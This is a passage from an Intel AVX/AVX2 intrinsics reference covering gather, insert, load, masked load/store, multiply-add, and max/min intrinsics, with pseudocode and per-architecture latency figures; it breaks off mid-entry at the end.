FOR j := 0 to 3 i := j*64 IF mask[i+63] dst[i+63:i] := MEM[base_addr + SignExtend(vindex[m+63:m])*scale] mask[i+63] := 0 ELSE dst[i+63:i] := src[i+63:i] FI ENDFOR mask[MAX:256] := 0 dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 6
vgatherqps
__m128 _mm_i64gather_ps (float const* base_addr, __m128i vindex, const int scale)

Synopsis

__m128 _mm_i64gather_ps (float const* base_addr, __m128i vindex, const int scale)
#include «immintrin.h»
Instruction: vgatherqps xmm, vm64x, xmm
CPUID Flags: AVX2

Description

Gather single-precision (32-bit) floating-point elements from memory using 64-bit indices. 32-bit elements are loaded from addresses starting at base_addr and offset by each 64-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst. scaleshould be 1, 2, 4 or 8.

Operation

FOR j := 0 to 1 i := j*32 m := j*64 dst[i+31:i] := MEM[base_addr + SignExtend(vindex[m+63:m])*scale] ENDFOR dst[MAX:64] := 0

Performance

Architecture Latency Throughput
Haswell 6
vgatherqps
__m128 _mm_mask_i64gather_ps (__m128 src, float const* base_addr, __m128i vindex, __m128 mask, const int scale)

Synopsis

__m128 _mm_mask_i64gather_ps (__m128 src, float const* base_addr, __m128i vindex, __m128 mask, const int scale)
#include «immintrin.h»
Instruction: vgatherqps xmm, vm64x, xmm
CPUID Flags: AVX2

Description

Gather single-precision (32-bit) floating-point elements from memory using 64-bit indices. 32-bit elements are loaded from addresses starting at base_addr and offset by each 64-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst using mask (elements are copied from src when the highest bit is not set in the corresponding element). scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 1 i := j*32 m := j*64 IF mask[i+31] dst[i+31:i] := MEM[base_addr + SignExtend(vindex[m+63:m])*scale] mask[i+31] := 0 ELSE dst[i+31:i] := src[i+31:i] FI ENDFOR mask[MAX:64] := 0 dst[MAX:64] := 0

Performance

Architecture Latency Throughput
Haswell 6
vgatherqps
__m128 _mm256_i64gather_ps (float const* base_addr, __m256i vindex, const int scale)

Synopsis

__m128 _mm256_i64gather_ps (float const* base_addr, __m256i vindex, const int scale)
#include «immintrin.h»
Instruction: vgatherqps ymm, vm64x, ymm
CPUID Flags: AVX2

Description

Gather single-precision (32-bit) floating-point elements from memory using 64-bit indices. 32-bit elements are loaded from addresses starting at base_addr and offset by each 64-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst. scaleshould be 1, 2, 4 or 8.

Operation

FOR j := 0 to 3 i := j*32 m := j*64 dst[i+31:i] := MEM[base_addr + SignExtend(vindex[m+63:m])*scale] ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 6
vgatherqps
__m128 _mm256_mask_i64gather_ps (__m128 src, float const* base_addr, __m256i vindex, __m128mask, const int scale)

Synopsis

__m128 _mm256_mask_i64gather_ps (__m128 src, float const* base_addr, __m256i vindex, __m128 mask, const int scale)
#include «immintrin.h»
Instruction: vgatherqps ymm, vm64x, ymm
CPUID Flags: AVX2

Description

Gather single-precision (32-bit) floating-point elements from memory using 64-bit indices. 32-bit elements are loaded from addresses starting at base_addr and offset by each 64-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst using mask (elements are copied from src when the highest bit is not set in the corresponding element). scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 3 i := j*32 m := j*64 IF mask[i+31] dst[i+31:i] := MEM[base_addr + SignExtend(vindex[m+63:m])*scale] mask[i+31] := 0 ELSE dst[i+31:i] := src[i+31:i] FI ENDFOR mask[MAX:128] := 0 dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 6
__m256i _mm256_insert_epi16 (__m256i a, __int16 i, const int index)

Synopsis

__m256i _mm256_insert_epi16 (__m256i a, __int16 i, const int index)
#include «immintrin.h»
CPUID Flags: AVX

Description

Copy a to dst, and insert the 16-bit integer i into dst at the location specified by index.

Operation

dst[255:0] := a[255:0] sel := index*16 dst[sel+15:sel] := i[15:0]
__m256i _mm256_insert_epi32 (__m256i a, __int32 i, const int index)

Synopsis

__m256i _mm256_insert_epi32 (__m256i a, __int32 i, const int index)
#include «immintrin.h»
CPUID Flags: AVX

Description

Copy a to dst, and insert the 32-bit integer i into dst at the location specified by index.

Operation

dst[255:0] := a[255:0] sel := index*32 dst[sel+31:sel] := i[31:0]
__m256i _mm256_insert_epi64 (__m256i a, __int64 i, const int index)

Synopsis

__m256i _mm256_insert_epi64 (__m256i a, __int64 i, const int index)
#include «immintrin.h»
CPUID Flags: AVX

Description

Copy a to dst, and insert the 64-bit integer i into dst at the location specified by index.

Operation

dst[255:0] := a[255:0] sel := index*64 dst[sel+63:sel] := i[63:0]
__m256i _mm256_insert_epi8 (__m256i a, __int8 i, const int index)

Synopsis

__m256i _mm256_insert_epi8 (__m256i a, __int8 i, const int index)
#include «immintrin.h»
CPUID Flags: AVX

Description

Copy a to dst, and insert the 8-bit integer i into dst at the location specified by index.

Operation

dst[255:0] := a[255:0] sel := index*8 dst[sel+7:sel] := i[7:0]
vinsertf128
__m256d _mm256_insertf128_pd (__m256d a, __m128d b, int imm8)

Synopsis

__m256d _mm256_insertf128_pd (__m256d a, __m128d b, int imm8)
#include «immintrin.h»
Instruction: vinsertf128 ymm, ymm, xmm, imm
CPUID Flags: AVX

Description

Copy a to dst, then insert 128 bits (composed of 2 packed double-precision (64-bit) floating-point elements) from b into dst at the location specified by imm8.

Operation

dst[255:0] := a[255:0] CASE imm8[7:0] of 0: dst[127:0] := b[127:0] 1: dst[255:128] := b[127:0] ESAC dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
Ivy Bridge 1
Sandy Bridge 1
vinsertf128
__m256 _mm256_insertf128_ps (__m256 a, __m128 b, int imm8)

Synopsis

__m256 _mm256_insertf128_ps (__m256 a, __m128 b, int imm8)
#include «immintrin.h»
Instruction: vinsertf128 ymm, ymm, xmm, imm
CPUID Flags: AVX

Description

Copy a to dst, then insert 128 bits (composed of 4 packed single-precision (32-bit) floating-point elements) from b into dst at the location specified by imm8.

Operation

dst[255:0] := a[255:0] CASE (imm8[1:0]) of 0: dst[127:0] := b[127:0] 1: dst[255:128] := b[127:0] ESAC dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
Ivy Bridge 1
Sandy Bridge 1
vinsertf128
__m256i _mm256_insertf128_si256 (__m256i a, __m128i b, int imm8)

Synopsis

__m256i _mm256_insertf128_si256 (__m256i a, __m128i b, int imm8)
#include «immintrin.h»
Instruction: vinsertf128 ymm, ymm, xmm, imm
CPUID Flags: AVX

Description

Copy a to dst, then insert 128 bits from b into dst at the location specified by imm8.

Operation

dst[255:0] := a[255:0] CASE (imm8[1:0]) of 0: dst[127:0] := b[127:0] 1: dst[255:128] := b[127:0] ESAC dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
Ivy Bridge 1
Sandy Bridge 1
vinserti128
__m256i _mm256_inserti128_si256 (__m256i a, __m128i b, const int imm8)

Synopsis

__m256i _mm256_inserti128_si256 (__m256i a, __m128i b, const int imm8)
#include «immintrin.h»
Instruction: vinserti128 ymm, ymm, xmm, imm
CPUID Flags: AVX2

Description

Copy a to dst, then insert 128 bits (composed of integer data) from b into dst at the location specified by imm8.

Operation

dst[255:0] := a[255:0] CASE (imm8[1:0]) of 0: dst[127:0] := b[127:0] 1: dst[255:128] := b[127:0] ESAC dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
vlddqu
__m256i _mm256_lddqu_si256 (__m256i const * mem_addr)

Synopsis

__m256i _mm256_lddqu_si256 (__m256i const * mem_addr)
#include «immintrin.h»
Instruction: vlddqu ymm, m256
CPUID Flags: AVX

Description

Load 256-bits of integer data from unaligned memory into dst. This intrinsic may perform better than _mm256_loadu_si256 when the data crosses a cache line boundary.

Operation

dst[255:0] := MEM[mem_addr+255:mem_addr] dst[MAX:256] := 0
vmovapd
__m256d _mm256_load_pd (double const * mem_addr)

Synopsis

__m256d _mm256_load_pd (double const * mem_addr)
#include «immintrin.h»
Instruction: vmovapd ymm, m256
CPUID Flags: AVX

Description

Load 256-bits (composed of 4 packed double-precision (64-bit) floating-point elements) from memory into dst. mem_addr must be aligned on a 32-byte boundary or a general-protection exception may be generated.

Operation

dst[255:0] := MEM[mem_addr+255:mem_addr] dst[MAX:256] := 0
vmovaps
__m256 _mm256_load_ps (float const * mem_addr)

Synopsis

__m256 _mm256_load_ps (float const * mem_addr)
#include «immintrin.h»
Instruction: vmovaps ymm, m256
CPUID Flags: AVX

Description

Load 256-bits (composed of 8 packed single-precision (32-bit) floating-point elements) from memory into dst. mem_addr must be aligned on a 32-byte boundary or a general-protection exception may be generated.

Operation

dst[255:0] := MEM[mem_addr+255:mem_addr] dst[MAX:256] := 0
vmovdqa
__m256i _mm256_load_si256 (__m256i const * mem_addr)

Synopsis

__m256i _mm256_load_si256 (__m256i const * mem_addr)
#include «immintrin.h»
Instruction: vmovdqa ymm, m256
CPUID Flags: AVX

Description

Load 256-bits of integer data from memory into dst. mem_addr must be aligned on a 32-byte boundary or a general-protection exception may be generated.

Operation

dst[255:0] := MEM[mem_addr+255:mem_addr] dst[MAX:256] := 0
vmovupd
__m256d _mm256_loadu_pd (double const * mem_addr)

Synopsis

__m256d _mm256_loadu_pd (double const * mem_addr)
#include «immintrin.h»
Instruction: vmovupd ymm, m256
CPUID Flags: AVX

Description

Load 256-bits (composed of 4 packed double-precision (64-bit) floating-point elements) from memory into dst. mem_addr does not need to be aligned on any particular boundary.

Operation

dst[255:0] := MEM[mem_addr+255:mem_addr] dst[MAX:256] := 0
vmovups
__m256 _mm256_loadu_ps (float const * mem_addr)

Synopsis

__m256 _mm256_loadu_ps (float const * mem_addr)
#include «immintrin.h»
Instruction: vmovups ymm, m256
CPUID Flags: AVX

Description

Load 256-bits (composed of 8 packed single-precision (32-bit) floating-point elements) from memory into dst. mem_addr does not need to be aligned on any particular boundary.

Operation

dst[255:0] := MEM[mem_addr+255:mem_addr] dst[MAX:256] := 0
vmovdqu
__m256i _mm256_loadu_si256 (__m256i const * mem_addr)

Synopsis

__m256i _mm256_loadu_si256 (__m256i const * mem_addr)
#include «immintrin.h»
Instruction: vmovdqu ymm, m256
CPUID Flags: AVX

Description

Load 256-bits of integer data from memory into dst. mem_addr does not need to be aligned on any particular boundary.

Operation

dst[255:0] := MEM[mem_addr+255:mem_addr] dst[MAX:256] := 0
__m256 _mm256_loadu2_m128 (float const* hiaddr, float const* loaddr)

Synopsis

__m256 _mm256_loadu2_m128 (float const* hiaddr, float const* loaddr)
#include «immintrin.h»
CPUID Flags: AVX

Description

Load two 128-bit values (composed of 4 packed single-precision (32-bit) floating-point elements) from memory, and combine them into a 256-bit value in dst. hiaddr and loaddr do not need to be aligned on any particular boundary.

Operation

dst[127:0] := MEM[loaddr+127:loaddr] dst[255:128] := MEM[hiaddr+127:hiaddr] dst[MAX:256] := 0
__m256d _mm256_loadu2_m128d (double const* hiaddr, double const* loaddr)

Synopsis

__m256d _mm256_loadu2_m128d (double const* hiaddr, double const* loaddr)
#include «immintrin.h»
CPUID Flags: AVX

Description

Load two 128-bit values (composed of 2 packed double-precision (64-bit) floating-point elements) from memory, and combine them into a 256-bit value in dst. hiaddr and loaddr do not need to be aligned on any particular boundary.

Operation

dst[127:0] := MEM[loaddr+127:loaddr] dst[255:128] := MEM[hiaddr+127:hiaddr] dst[MAX:256] := 0
__m256i _mm256_loadu2_m128i (__m128i const* hiaddr, __m128i const* loaddr)

Synopsis

__m256i _mm256_loadu2_m128i (__m128i const* hiaddr, __m128i const* loaddr)
#include «immintrin.h»
CPUID Flags: AVX

Description

Load two 128-bit values (composed of integer data) from memory, and combine them into a 256-bit value in dst. hiaddr and loaddr do not need to be aligned on any particular boundary.

Operation

dst[127:0] := MEM[loaddr+127:loaddr] dst[255:128] := MEM[hiaddr+127:hiaddr] dst[MAX:256] := 0
vpmaddwd
__m256i _mm256_madd_epi16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_madd_epi16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpmaddwd ymm, ymm, ymm
CPUID Flags: AVX2

Description

Multiply packed signed 16-bit integers in a and b, producing intermediate signed 32-bit integers. Horizontally add adjacent pairs of intermediate 32-bit integers, and pack the results in dst.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := a[i+31:i+16]*b[i+31:i+16] + a[i+15:i]*b[i+15:i] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 5 1
vpmaddubsw
__m256i _mm256_maddubs_epi16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_maddubs_epi16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpmaddubsw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Vertically multiply each unsigned 8-bit integer from a with the corresponding signed 8-bit integer from b, producing intermediate signed 16-bit integers. Horizontally add adjacent pairs of intermediate signed 16-bit integers, and pack the saturated results in dst.

Operation

FOR j := 0 to 15 i := j*16 dst[i+15:i] := Saturate_To_Int16( a[i+15:i+8]*b[i+15:i+8] + a[i+7:i]*b[i+7:i] ) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 5 1
vpmaskmovd
__m128i _mm_maskload_epi32 (int const* mem_addr, __m128i mask)

Synopsis

__m128i _mm_maskload_epi32 (int const* mem_addr, __m128i mask)
#include «immintrin.h»
Instruction: vpmaskmovd xmm, xmm, m128
CPUID Flags: AVX2

Description

Load packed 32-bit integers from memory into dst using mask (elements are zeroed out when the highest bit is not set in the corresponding element).

Operation

FOR j := 0 to 3 i := j*32 IF mask[i+31] dst[i+31:i] := MEM[mem_addr+i+31:mem_addr+i] ELSE dst[i+31:i] := 0 FI ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 2
vpmaskmovd
__m256i _mm256_maskload_epi32 (int const* mem_addr, __m256i mask)

Synopsis

__m256i _mm256_maskload_epi32 (int const* mem_addr, __m256i mask)
#include «immintrin.h»
Instruction: vpmaskmovd ymm, ymm, m256
CPUID Flags: AVX2

Description

Load packed 32-bit integers from memory into dst using mask (elements are zeroed out when the highest bit is not set in the corresponding element).

Operation

FOR j := 0 to 7 i := j*32 IF mask[i+31] dst[i+31:i] := MEM[mem_addr+i+31:mem_addr+i] ELSE dst[i+31:i] := 0 FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 2
vpmaskmovq
__m128i _mm_maskload_epi64 (__int64 const* mem_addr, __m128i mask)

Synopsis

__m128i _mm_maskload_epi64 (__int64 const* mem_addr, __m128i mask)
#include «immintrin.h»
Instruction: vpmaskmovq xmm, xmm, m128
CPUID Flags: AVX2

Description

Load packed 64-bit integers from memory into dst using mask (elements are zeroed out when the highest bit is not set in the corresponding element).

Operation

FOR j := 0 to 1 i := j*64 IF mask[i+63] dst[i+63:i] := MEM[mem_addr+i+63:mem_addr+i] ELSE dst[i+63:i] := 0 FI ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 2
vpmaskmovq
__m256i _mm256_maskload_epi64 (__int64 const* mem_addr, __m256i mask)

Synopsis

__m256i _mm256_maskload_epi64 (__int64 const* mem_addr, __m256i mask)
#include «immintrin.h»
Instruction: vpmaskmovq ymm, ymm, m256
CPUID Flags: AVX2

Description

Load packed 64-bit integers from memory into dst using mask (elements are zeroed out when the highest bit is not set in the corresponding element).

Operation

FOR j := 0 to 3 i := j*64 IF mask[i+63] dst[i+63:i] := MEM[mem_addr+i+63:mem_addr+i] ELSE dst[i+63:i] := 0 FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 2
vmaskmovpd
__m128d _mm_maskload_pd (double const * mem_addr, __m128i mask)

Synopsis

__m128d _mm_maskload_pd (double const * mem_addr, __m128i mask)
#include «immintrin.h»
Instruction: vmaskmovpd xmm, xmm, m128
CPUID Flags: AVX

Description

Load packed double-precision (64-bit) floating-point elements from memory into dst using mask (elements are zeroed out when the high bit of the corresponding element is not set).

Operation

FOR j := 0 to 1 i := j*64 IF mask[i+63] dst[i+63:i] := MEM[mem_addr+i+63:mem_addr+i] ELSE dst[i+63:i] := 0 FI ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 2
Ivy Bridge 2
Sandy Bridge 2
vmaskmovpd
__m256d _mm256_maskload_pd (double const * mem_addr, __m256i mask)

Synopsis

__m256d _mm256_maskload_pd (double const * mem_addr, __m256i mask)
#include «immintrin.h»
Instruction: vmaskmovpd ymm, ymm, m256
CPUID Flags: AVX

Description

Load packed double-precision (64-bit) floating-point elements from memory into dst using mask (elements are zeroed out when the high bit of the corresponding element is not set).

Operation

FOR j := 0 to 3 i := j*64 IF mask[i+63] dst[i+63:i] := MEM[mem_addr+i+63:mem_addr+i] ELSE dst[i+63:i] := 0 FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 2
Ivy Bridge 2
Sandy Bridge 2
vmaskmovps
__m128 _mm_maskload_ps (float const * mem_addr, __m128i mask)

Synopsis

__m128 _mm_maskload_ps (float const * mem_addr, __m128i mask)
#include «immintrin.h»
Instruction: vmaskmovps xmm, xmm, m128
CPUID Flags: AVX

Description

Load packed single-precision (32-bit) floating-point elements from memory into dst using mask (elements are zeroed out when the high bit of the corresponding element is not set).

Operation

FOR j := 0 to 3 i := j*32 IF mask[i+31] dst[i+31:i] := MEM[mem_addr+i+31:mem_addr+i] ELSE dst[i+31:i] := 0 FI ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 2
Ivy Bridge 2
Sandy Bridge 2
vmaskmovps
__m256 _mm256_maskload_ps (float const * mem_addr, __m256i mask)

Synopsis

__m256 _mm256_maskload_ps (float const * mem_addr, __m256i mask)
#include «immintrin.h»
Instruction: vmaskmovps ymm, ymm, m256
CPUID Flags: AVX

Description

Load packed single-precision (32-bit) floating-point elements from memory into dst using mask (elements are zeroed out when the high bit of the corresponding element is not set).

Operation

FOR j := 0 to 7 i := j*32 IF mask[i+31] dst[i+31:i] := MEM[mem_addr+i+31:mem_addr+i] ELSE dst[i+31:i] := 0 FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 2
Ivy Bridge 2
Sandy Bridge 2
vpmaskmovd
void _mm_maskstore_epi32 (int* mem_addr, __m128i mask, __m128i a)

Synopsis

void _mm_maskstore_epi32 (int* mem_addr, __m128i mask, __m128i a)
#include «immintrin.h»
Instruction: vpmaskmovd m128, xmm, xmm
CPUID Flags: AVX2

Description

Store packed 32-bit integers from a into memory using mask (elements are not stored when the highest bit is not set in the corresponding element).

Operation

FOR j := 0 to 3 i := j*32 IF mask[i+31] MEM[mem_addr+i+31:mem_addr+i] := a[i+31:i] FI ENDFOR

Performance

Architecture Latency Throughput
Haswell 4
vpmaskmovd
void _mm256_maskstore_epi32 (int* mem_addr, __m256i mask, __m256i a)

Synopsis

void _mm256_maskstore_epi32 (int* mem_addr, __m256i mask, __m256i a)
#include «immintrin.h»
Instruction: vpmaskmovd m256, ymm, ymm
CPUID Flags: AVX2

Description

Store packed 32-bit integers from a into memory using mask (elements are not stored when the highest bit is not set in the corresponding element).

Operation

FOR j := 0 to 7 i := j*32 IF mask[i+31] MEM[mem_addr+i+31:mem_addr+i] := a[i+31:i] FI ENDFOR

Performance

Architecture Latency Throughput
Haswell 4
vpmaskmovq
void _mm_maskstore_epi64 (__int64* mem_addr, __m128i mask, __m128i a)

Synopsis

void _mm_maskstore_epi64 (__int64* mem_addr, __m128i mask, __m128i a)
#include «immintrin.h»
Instruction: vpmaskmovq m128, xmm, xmm
CPUID Flags: AVX2

Description

Store packed 64-bit integers from a into memory using mask (elements are not stored when the highest bit is not set in the corresponding element).

Operation

FOR j := 0 to 1 i := j*64 IF mask[i+63] MEM[mem_addr+i+63:mem_addr+i] := a[i+63:i] FI ENDFOR

Performance

Architecture Latency Throughput
Haswell 4
vpmaskmovq
void _mm256_maskstore_epi64 (__int64* mem_addr, __m256i mask, __m256i a)

Synopsis

void _mm256_maskstore_epi64 (__int64* mem_addr, __m256i mask, __m256i a)
#include «immintrin.h»
Instruction: vpmaskmovq m256, ymm, ymm
CPUID Flags: AVX2

Description

Store packed 64-bit integers from a into memory using mask (elements are not stored when the highest bit is not set in the corresponding element).

Operation

FOR j := 0 to 3 i := j*64 IF mask[i+63] MEM[mem_addr+i+63:mem_addr+i] := a[i+63:i] FI ENDFOR

Performance

Architecture Latency Throughput
Haswell 4
vmaskmovpd
void _mm_maskstore_pd (double * mem_addr, __m128i mask, __m128d a)

Synopsis

void _mm_maskstore_pd (double * mem_addr, __m128i mask, __m128d a)
#include «immintrin.h»
Instruction: vmaskmovpd m128, xmm, xmm
CPUID Flags: AVX

Description

Store packed double-precision (64-bit) floating-point elements from a into memory using mask.

Operation

FOR j := 0 to 1 i := j*64 IF mask[i+63] MEM[mem_addr+i+63:mem_addr+i] := a[i+63:i] FI ENDFOR

Performance

Architecture Latency Throughput
Haswell 4
Ivy Bridge 1
Sandy Bridge 1
vmaskmovpd
void _mm256_maskstore_pd (double * mem_addr, __m256i mask, __m256d a)

Synopsis

void _mm256_maskstore_pd (double * mem_addr, __m256i mask, __m256d a)
#include «immintrin.h»
Instruction: vmaskmovpd m256, ymm, ymm
CPUID Flags: AVX

Description

Store packed double-precision (64-bit) floating-point elements from a into memory using mask.

Operation

FOR j := 0 to 3 i := j*64 IF mask[i+63] MEM[mem_addr+i+63:mem_addr+i] := a[i+63:i] FI ENDFOR

Performance

Architecture Latency Throughput
Haswell 4
Ivy Bridge 1
Sandy Bridge 1
vmaskmovps
void _mm_maskstore_ps (float * mem_addr, __m128i mask, __m128 a)

Synopsis

void _mm_maskstore_ps (float * mem_addr, __m128i mask, __m128 a)
#include «immintrin.h»
Instruction: vmaskmovps m128, xmm, xmm
CPUID Flags: AVX

Description

Store packed single-precision (32-bit) floating-point elements from a into memory using mask.

Operation

FOR j := 0 to 3 i := j*32 IF mask[i+31] MEM[mem_addr+i+31:mem_addr+i] := a[i+31:i] FI ENDFOR

Performance

Architecture Latency Throughput
Haswell 4
Ivy Bridge 1
Sandy Bridge 1
vmaskmovps
void _mm256_maskstore_ps (float * mem_addr, __m256i mask, __m256 a)

Synopsis

void _mm256_maskstore_ps (float * mem_addr, __m256i mask, __m256 a)
#include «immintrin.h»
Instruction: vmaskmovps m256, ymm, ymm
CPUID Flags: AVX

Description

Store packed single-precision (32-bit) floating-point elements from a into memory using mask.

Operation

FOR j := 0 to 7 i := j*32 IF mask[i+31] MEM[mem_addr+i+31:mem_addr+i] := a[i+31:i] FI ENDFOR

Performance

Architecture Latency Throughput
Haswell 4
Ivy Bridge 1
Sandy Bridge 1
vpmaxsw
__m256i _mm256_max_epi16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_max_epi16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpmaxsw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compare packed 16-bit integers in a and b, and store packed maximum values in dst.

Operation

FOR j := 0 to 15 i := j*16 IF a[i+15:i] > b[i+15:i] dst[i+15:i] := a[i+15:i] ELSE dst[i+15:i] := b[i+15:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpmaxsd
__m256i _mm256_max_epi32 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_max_epi32 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpmaxsd ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compare packed 32-bit integers in a and b, and store packed maximum values in dst.

Operation

FOR j := 0 to 7 i := j*32 IF a[i+31:i] > b[i+31:i] dst[i+31:i] := a[i+31:i] ELSE dst[i+31:i] := b[i+31:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 0.5
vpmaxsb
__m256i _mm256_max_epi8 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_max_epi8 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpmaxsb ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compare packed 8-bit integers in a and b, and store packed maximum values in dst.

Operation

FOR j := 0 to 31 i := j*8 IF a[i+7:i] > b[i+7:i] dst[i+7:i] := a[i+7:i] ELSE dst[i+7:i] := b[i+7:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpmaxuw
__m256i _mm256_max_epu16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_max_epu16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpmaxuw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compare packed unsigned 16-bit integers in a and b, and store packed maximum values in dst.

Operation

FOR j := 0 to 15 i := j*16 IF a[i+15:i] > b[i+15:i] dst[i+15:i] := a[i+15:i] ELSE dst[i+15:i] := b[i+15:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpmaxud
__m256i _mm256_max_epu32 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_max_epu32 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpmaxud ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compare packed unsigned 32-bit integers in a and b, and store packed maximum values in dst.

Operation

FOR j := 0 to 7 i := j*32 IF a[i+31:i] > b[i+31:i] dst[i+31:i] := a[i+31:i] ELSE dst[i+31:i] := b[i+31:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 0.5
vpmaxub
__m256i _mm256_max_epu8 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_max_epu8 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpmaxub ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compare packed unsigned 8-bit integers in a and b, and store packed maximum values in dst.

Operation

FOR j := 0 to 31 i := j*8 IF a[i+7:i] > b[i+7:i] dst[i+7:i] := a[i+7:i] ELSE dst[i+7:i] := b[i+7:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vmaxpd
__m256d _mm256_max_pd (__m256d a, __m256d b)

Synopsis

__m256d _mm256_max_pd (__m256d a, __m256d b)
#include «immintrin.h»
Instruction: vmaxpd ymm, ymm, ymm
CPUID Flags: AVX

Description

Compare packed double-precision (64-bit) floating-point elements in a and b, and store packed maximum values in dst.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := MAX(a[i+63:i], b[i+63:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 3 1
Sandy Bridge 3 1
vmaxps
__m256 _mm256_max_ps (__m256 a, __m256 b)

Synopsis

__m256 _mm256_max_ps (__m256 a, __m256 b)
#include «immintrin.h»
Instruction: vmaxps ymm, ymm, ymm
CPUID Flags: AVX

Description

Compare packed single-precision (32-bit) floating-point elements in a and b, and store packed maximum values in dst.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := MAX(a[i+31:i], b[i+31:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 3 1
Sandy Bridge 3 1
vpminsw
__m256i _mm256_min_epi16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_min_epi16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpminsw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compare packed 16-bit integers in a and b, and store packed minimum values in dst.

Operation

FOR j := 0 to 15 i := j*16 IF a[i+15:i] < b[i+15:i] dst[i+15:i] := a[i+15:i] ELSE dst[i+15:i] := b[i+15:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpminsd
__m256i _mm256_min_epi32 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_min_epi32 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpminsd ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compare packed 32-bit integers in a and b, and store packed minimum values in dst.

Operation

FOR j := 0 to 7 i := j*32 IF a[i+31:i] < b[i+31:i] dst[i+31:i] := a[i+31:i] ELSE dst[i+31:i] := b[i+31:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpminsb
__m256i _mm256_min_epi8 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_min_epi8 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpminsb ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compare packed 8-bit integers in a and b, and store packed minimum values in dst.

Operation

FOR j := 0 to 31 i := j*8 IF a[i+7:i] < b[i+7:i] dst[i+7:i] := a[i+7:i] ELSE dst[i+7:i] := b[i+7:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpminuw
__m256i _mm256_min_epu16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_min_epu16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpminuw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compare packed unsigned 16-bit integers in a and b, and store packed minimum values in dst.

Operation

FOR j := 0 to 15 i := j*16 IF a[i+15:i] < b[i+15:i] dst[i+15:i] := a[i+15:i] ELSE dst[i+15:i] := b[i+15:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpminud
__m256i _mm256_min_epu32 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_min_epu32 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpminud ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compare packed unsigned 32-bit integers in a and b, and store packed minimum values in dst.

Operation

